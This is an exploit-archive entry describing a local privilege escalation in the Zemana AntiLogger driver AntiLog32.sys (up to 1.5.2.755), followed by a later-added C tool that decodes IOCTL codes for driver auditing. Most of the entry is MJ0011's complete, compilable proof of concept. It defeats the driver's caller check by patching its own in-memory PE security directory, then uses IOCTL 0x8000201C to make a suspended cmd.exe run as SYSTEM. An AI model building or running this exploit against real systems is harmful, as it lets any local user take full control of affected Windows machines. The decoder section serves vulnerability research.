Description
Local privilege escalation exploit for the Windows platform (0day.today category: local exploits). A user-reachable IOCTL in the Zemana AntiLogger driver AntiLog32.sys lets any local process take over the privileges of another process, including the System process.
Title: Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation
Source: 0day.today (zdt), exploit 13499, https://0day.today/exploit/13499 (description page: https://0day.today/exploit/description/13499)
Reporter: th_decoder (the proof of concept itself is credited to MJ0011)
Published: 2010-07-28 (modified 2010-07-28, last seen 2018-03-19)
Platform / category: Windows, local exploits
CVSS: none assigned; no CVE listed

=======================================================================
Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation
=======================================================================

Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability

VULNERABLE PRODUCTS
Zemana AntiLogger <= 1.9.2.2.206 (driver AntiLog32.sys <= 1.5.2.755)

DETAILS:
AntiLog32.sys creates a device named \Device\AntiLog32 and handles the DeviceIoControl request with IoControlCode 0x8000201C, which is CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS). The input buffer carries two process IDs, and the request gives the first process the privileges of the second. The proof of concept below starts cmd.exe suspended, passes its PID together with the PID of the System process (4 on Windows XP and later), and then resumes cmd.exe, which from that point runs as SYSTEM.

Two details matter when assessing or reproducing this. First, the IOCTL is defined with FILE_ANY_ACCESS, so the device can be opened with FILE_READ_ATTRIBUTES alone and the I/O manager performs no further access check before the driver's dispatch routine sees the request; whatever caller validation exists has to be done by the driver itself. Second, the check the driver makes when the device is opened appears to look only at the calling image's PE security (Authenticode) data directory, and the PoC defeats it by writing a non-zero value into that entry of its own in-memory header before calling CreateFile.

EXPLOIT CODE:

#include "stdafx.h"      // Visual Studio precompiled header; drop it when building outside a VS project
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winioctl.h>

// 0x8000201C: vendor device type 0x8000, function 0x807, METHOD_BUFFERED,
// FILE_ANY_ACCESS (the I/O manager requires no access right on the handle)
#define IOCTL_IMPERSONATE_PROCESS CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS)

// Input buffer of the IOCTL; both fields carry process IDs, not handles
typedef struct _IMPERSONATE_PROCESS {
    HANDLE ImpersonateProcess;   // PID of the process to elevate
    HANDLE SystemProcess;        // PID of the process whose privileges it receives
} IMPERSONATE_PROCESS, *PIMPERSONATE_PROCESS;

int main(int argc, char* argv[])
{
    printf("Zemana AntiLogger <=1.9.2.2.206 AntiLog32.sys <= 1.5.2.755\n"
           "Local Privilege Escalation Vulnerability Proof-of-Concept\n"
           "2010-7-28\n"
           "By MJ0011 [email protected]\n\nPress Enter\n");
    getchar();

    // Bypass the driver's create check: it appears to inspect the caller's
    // PE security (Authenticode) data directory, so point the in-memory
    // header's entry at a non-zero RVA before opening the device.
    PIMAGE_DOS_HEADER pdoshdr = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pnthdr = (PIMAGE_NT_HEADERS)((ULONG_PTR)pdoshdr + pdoshdr->e_lfanew);
    PVOID waddr = &pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress;

    DWORD oldp;
    VirtualProtect(waddr, sizeof(ULONG), PAGE_READWRITE, &oldp);
    pnthdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress = 0x1;
    VirtualProtect(waddr, sizeof(ULONG), oldp, &oldp);

    // FILE_READ_ATTRIBUTES is enough because the IOCTL is FILE_ANY_ACCESS
    HANDLE hdev = CreateFileA("\\\\.\\AntiLog32",
                              FILE_READ_ATTRIBUTES,
                              FILE_SHARE_READ,
                              NULL,
                              OPEN_EXISTING,
                              0, NULL);
    if (hdev == INVALID_HANDLE_VALUE)
    {
        printf("cannot open device %u\n", GetLastError());
        getchar();
        return 1;
    }

    // Start cmd.exe suspended so it is elevated before it executes anything
    STARTUPINFOA sia;
    memset(&sia, 0, sizeof(sia));
    sia.cb = sizeof(sia);
    PROCESS_INFORMATION pi;
    memset(&pi, 0, sizeof(pi));

    if (!CreateProcessA("c:\\windows\\system32\\cmd.exe",
                        NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED,
                        NULL, NULL, &sia, &pi))
    {
        printf("cannot run cmd.exe....%u\n", GetLastError());
        getchar();
        return 1;
    }

    // Ask the driver to give the suspended cmd.exe the privileges of the
    // System process (PID 4 on Windows XP and later)
    IMPERSONATE_PROCESS ip;
    ip.ImpersonateProcess = (HANDLE)(ULONG_PTR)pi.dwProcessId;
    ip.SystemProcess = (HANDLE)4;
    DWORD btr;

    if (!DeviceIoControl(hdev, IOCTL_IMPERSONATE_PROCESS, &ip, sizeof(ip), NULL, 0, &btr, NULL))
    {
        printf("cannot impersonate process %u\n", GetLastError());
        getchar();
        return 1;
    }

    ResumeThread(pi.hThread);   // cmd.exe now runs as SYSTEM
    printf("OK\n");
    return 0;
}

================================
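As an added example (not part of the 0day.today entry or of MJ0011's proof of concept), the decoder below splits a Windows I/O control code into the four fields CTL_CODE packs into it, so the 0x8000201C named in the DETAILS section can be checked against the PoC's CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS), and so the two properties that make the bug reachable (vendor-defined device type, FILE_ANY_ACCESS) can be read off any IOCTL found while auditing a driver. The CTL_CODE macro and the METHOD_*/FILE_* constants are reproduced from winioctl.h so the code builds without the Windows SDK; the function and struct names are the example's own.

```c
/*
 * Added example, not part of the original advisory or of MJ0011's PoC:
 * decode a Windows I/O control code into the four fields CTL_CODE packs
 * into it, so 0x8000201C from the DETAILS section can be checked against
 * the PoC's CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS).
 * The macro and constants mirror winioctl.h so this builds without the
 * Windows SDK (plain C99, no Windows calls).
 */
#include <stdio.h>
#include <stdint.h>

/* Layout from winioctl.h: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define CTL_CODE(DeviceType, Function, Method, Access)                     \
    (((uint32_t)(DeviceType) << 16) | ((uint32_t)(Access) << 14) |          \
     ((uint32_t)(Function) << 2) | (uint32_t)(Method))

#define METHOD_BUFFERED   0u
#define METHOD_IN_DIRECT  1u
#define METHOD_OUT_DIRECT 2u
#define METHOD_NEITHER    3u

#define FILE_ANY_ACCESS   0u
#define FILE_READ_ACCESS  1u
#define FILE_WRITE_ACCESS 2u

typedef struct ioctl_fields {
    uint32_t device_type; /* 16 bits; 0x8000-0xFFFF are for third-party vendors */
    uint32_t function;    /* 12 bits; 0x800-0xFFF are for third-party vendors */
    uint32_t method;      /* 2 bits; how the I/O manager hands over the buffers */
    uint32_t access;      /* 2 bits; access rights the handle must hold */
} ioctl_fields;

ioctl_fields ioctl_decode(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Non-Microsoft device type: where antivirus and other vendor drivers live,
 * and where an audit of user-reachable IOCTLs usually starts. */
int ioctl_is_vendor_defined(uint32_t code)
{
    return ioctl_decode(code).device_type >= 0x8000u;
}

/* With FILE_ANY_ACCESS the I/O manager does not require the device handle to
 * have been opened with FILE_READ_DATA or FILE_WRITE_DATA, which is why the PoC
 * can open \\.\AntiLog32 with FILE_READ_ATTRIBUTES alone and still reach the
 * dispatch routine. Any check on the caller is then entirely the driver's job. */
int ioctl_needs_no_handle_access(uint32_t code)
{
    return ioctl_decode(code).access == FILE_ANY_ACCESS;
}

const char *ioctl_method_name(uint32_t method)
{
    switch (method) {
    case METHOD_BUFFERED:   return "METHOD_BUFFERED";
    case METHOD_IN_DIRECT:  return "METHOD_IN_DIRECT";
    case METHOD_OUT_DIRECT: return "METHOD_OUT_DIRECT";
    default:                return "METHOD_NEITHER";
    }
}

const char *ioctl_access_name(uint32_t access)
{
    switch (access) {
    case FILE_ANY_ACCESS:   return "FILE_ANY_ACCESS";
    case FILE_READ_ACCESS:  return "FILE_READ_ACCESS";
    case FILE_WRITE_ACCESS: return "FILE_WRITE_ACCESS";
    default:                return "FILE_READ_ACCESS|FILE_WRITE_ACCESS";
    }
}

int main(void)
{
    uint32_t code = CTL_CODE(0x8000, 0x807, METHOD_BUFFERED, FILE_ANY_ACCESS);
    ioctl_fields f = ioctl_decode(code);
    printf("IOCTL 0x%08X: device type 0x%04X, function 0x%03X, %s, %s\n",
           (unsigned)code, (unsigned)f.device_type, (unsigned)f.function,
           ioctl_method_name(f.method), ioctl_access_name(f.access));
    printf("vendor-defined: %s, reachable with FILE_READ_ATTRIBUTES only: %s\n",
           ioctl_is_vendor_defined(code) ? "yes" : "no",
           ioctl_needs_no_handle_access(code) ? "yes" : "no");
    return 0;
}
```

Running it confirms that the PoC's define is the 0x8000201C the advisory names, and reports both flags as "yes". The same decoder applied to codes recovered from a driver's dispatch routine (for instance by searching for compare instructions against 0x8000xxxx constants) gives a quick first cut of which requests are vendor-specific and which ones need nothing more than an open handle to reach.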